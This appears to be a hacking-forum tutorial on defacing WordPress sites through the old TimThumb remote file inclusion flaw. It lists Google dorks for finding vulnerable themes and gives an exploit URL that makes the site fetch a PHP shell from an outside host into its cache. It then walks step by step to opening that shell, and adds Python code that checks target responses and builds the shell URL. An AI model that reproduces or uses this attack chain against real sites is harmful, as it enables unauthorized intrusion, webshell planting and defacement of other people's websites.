Deface Methode Tim-thumb Exploit WordPress


Hi guys.... this time I'm sharing how to deface WordPress with the TimThumb exploit method
OK, let's get started
no more chatter :v

Ingredients
dork
coffee
cigarettes
internet :v
Exploit (the src value; note that the host only contains flickr.com as a substring, it does not belong to Flickr)
?src=http://flickr.com.x-groups.org/M3PS.php

Dork :
inurl:/wp-content/themes/TheStyle/
inurl:/wp-content/themes/nool/
inurl:/wp-content/themes/PersonalPress/
inurl:/wp-content/themes/SimplePress/
inurl:/wp-content/themes/DeepFocus/
inurl:/wp-content/themes/DelicateNews/
inurl:/wp-content/themes/Bold/
inurl:/wp-content/themes/eStore/
inurl:/wp-content/themes/TheProfessional/
inurl:/wp-content/themes/OnTheGo/
inurl:/wp-content/themes/AskIt/
inurl:/wp-content/themes/Nova/
inurl:/wp-content/themes/eNews/
inurl:/timthumb.php? site:.
inurl:/admin/timthumb.php? site:.

1. First, run the dorks on uncle Google :)


2. Find your target.... I already have a live target hehe :v


3. Append /timthumb.php to the site, e.g. http://site.com/timthumb.php,
to check whether it is vulnerable or not :v  the example is below

4. Now put in the exploit, e.g. http://site.com/timthumb.php?src=http://flickr.com.x-groups.org/M3PS.php (that is the exploit from above). That src value works because TimThumb versions before 1.33 only check that an allowed domain such as flickr.com appears somewhere in the hostname, not that the host actually belongs to that domain, so flickr.com.x-groups.org passes the check. If you get text like
Unable to open image : /home/truongdua/domains/truongduahotel.com/public_html/cache/external_461550a752f07cfaf990acce7236424c.php
Query String : src=http://flickr.com.x-groups.org/M3PS.php
TimThumb version : 1.30
it means TimThumb fetched the file, saved it in its cache directory with the .php extension copied from the URL, and only then failed because it is not an image. The PHP file is now sitting under the web root, so the site can have a shell uploaded this way. Check the version line: 1.30 is before the fix; from 1.33 on (and the 2.0 rewrite) the host check is anchored and the cached copy is no longer written as .php, so this step fails there.

5. Now append it to the site, e.g. https://site.com//cache/external_461550a752f07cfaf990acce7236424c.php. The part you need is the cache path after public_html; the cache directory sits next to timthumb.php, so if timthumb.php lives under a theme directory, the cached file is under that theme's cache/ directory, not at the site root.

boom, your shell shows up :)

6. What you do from there is up to you
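To see why that src value gets through and what the error text in step 4 tells you, here is an added Python example (not code from this post and not TimThumb's own PHP) that re-implements the allow-list check the way TimThumb 1.x did it next to an anchored one, derives the cache filename the same way, parses the error text quoted above to pull out the cache path and version, and turns the cache path into the URL used in step 5. The allowed-site list and the external_<md5>.<ext> naming follow TimThumb 1.x; that the md5 is taken over the raw src string and that the cache directory is ./cache next to timthumb.php are assumptions; the sample response is the output quoted in step 4.

```python
"""Added example: why ?src=http://flickr.com.x-groups.org/M3PS.php passes TimThumb 1.x.
Python re-implementation of the relevant logic, not the plugin's own code.
"""
import hashlib
import os
import re
from urllib.parse import urlparse

# Default remote-host allow list shipped with TimThumb 1.x; flickr.com is the
# entry the exploit URL on this page impersonates.
ALLOWED_SITES = ["flickr.com", "picasa.com", "blogger.com",
                 "wordpress.com", "img.youtube.com"]

# Versions below this still have the substring host check and write the
# cached copy with the extension taken from the URL.
FIXED_VERSION = (1, 33)

# Sample response: the error output quoted in step 4 of this post.
SAMPLE_RESPONSE = """Unable to open image : /home/truongdua/domains/truongduahotel.com/public_html/cache/external_461550a752f07cfaf990acce7236424c.php
Query String : src=http://flickr.com.x-groups.org/M3PS.php
TimThumb version : 1.30"""


def host_allowed_v1(src):
    """TimThumb < 1.33 logic: an allowed domain appearing anywhere in the host
    is enough, so flickr.com.x-groups.org and evilflickr.com both pass."""
    host = (urlparse(src).hostname or "").lower()
    return any(site in host for site in ALLOWED_SITES)


def host_allowed_fixed(src):
    """Anchored check: the host must be the allowed domain or a subdomain of it."""
    host = (urlparse(src).hostname or "").lower()
    return any(host == site or host.endswith("." + site) for site in ALLOWED_SITES)


def cache_filename_v1(src):
    """Cached copy name, external_<md5>.<ext>, with the extension copied from
    the URL. Assumption: the md5 is computed over the raw src string."""
    ext = os.path.splitext(urlparse(src).path)[1].lstrip(".").lower()
    return "external_" + hashlib.md5(src.encode()).hexdigest() + "." + ext


ERROR_RE = re.compile(r"Unable to open image\s*:\s*(\S+)")
VERSION_RE = re.compile(r"TimThumb version\s*:\s*(\d+(?:\.\d+)*)")


def triage_response(body):
    """Pull the cache path and version out of the TimThumb error page and say
    whether the fetched file landed as .php on a pre-fix version."""
    path_m = ERROR_RE.search(body)
    ver_m = VERSION_RE.search(body)
    cache_path = path_m.group(1) if path_m else None
    version = ver_m.group(1) if ver_m else None
    pre_fix = None
    if version:
        # TimThumb 1.x used a two-digit minor ("1.30"), so tuple compare works.
        pre_fix = tuple(int(p) for p in version.split(".")) < FIXED_VERSION
    return {
        "cache_path": cache_path,
        "version": version,
        "pre_fix_version": pre_fix,
        "cached_as_php": bool(cache_path) and cache_path.lower().endswith(".php"),
    }


def cache_url(timthumb_url, cache_path):
    """Where the cached file is reachable: ./cache next to timthumb.php
    (assumption: TimThumb's default cache directory of './cache')."""
    base = timthumb_url.rsplit("/", 1)[0]
    return base + "/cache/" + cache_path.rsplit("/", 1)[-1]


if __name__ == "__main__":
    src = "http://flickr.com.x-groups.org/M3PS.php"
    print("1.x check:  ", host_allowed_v1(src))      # True
    print("fixed check:", host_allowed_fixed(src))   # False
    print("cache name: ", cache_filename_v1(src))
    info = triage_response(SAMPLE_RESPONSE)
    print(info)
    print(cache_url("http://site.com/timthumb.php", info["cache_path"]))
```

The two host checks side by side are the whole story: `flickr.com` is a substring of `flickr.com.x-groups.org`, so the 1.x check passes, while the anchored check only accepts `flickr.com` itself or a real subdomain of it. `triage_response` is the quick go/no-go for step 4: version below 1.33 plus a cache path ending in .php is what the post calls "the site can have a shell uploaded".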
 


That's all, thank you
hope it's useful :)



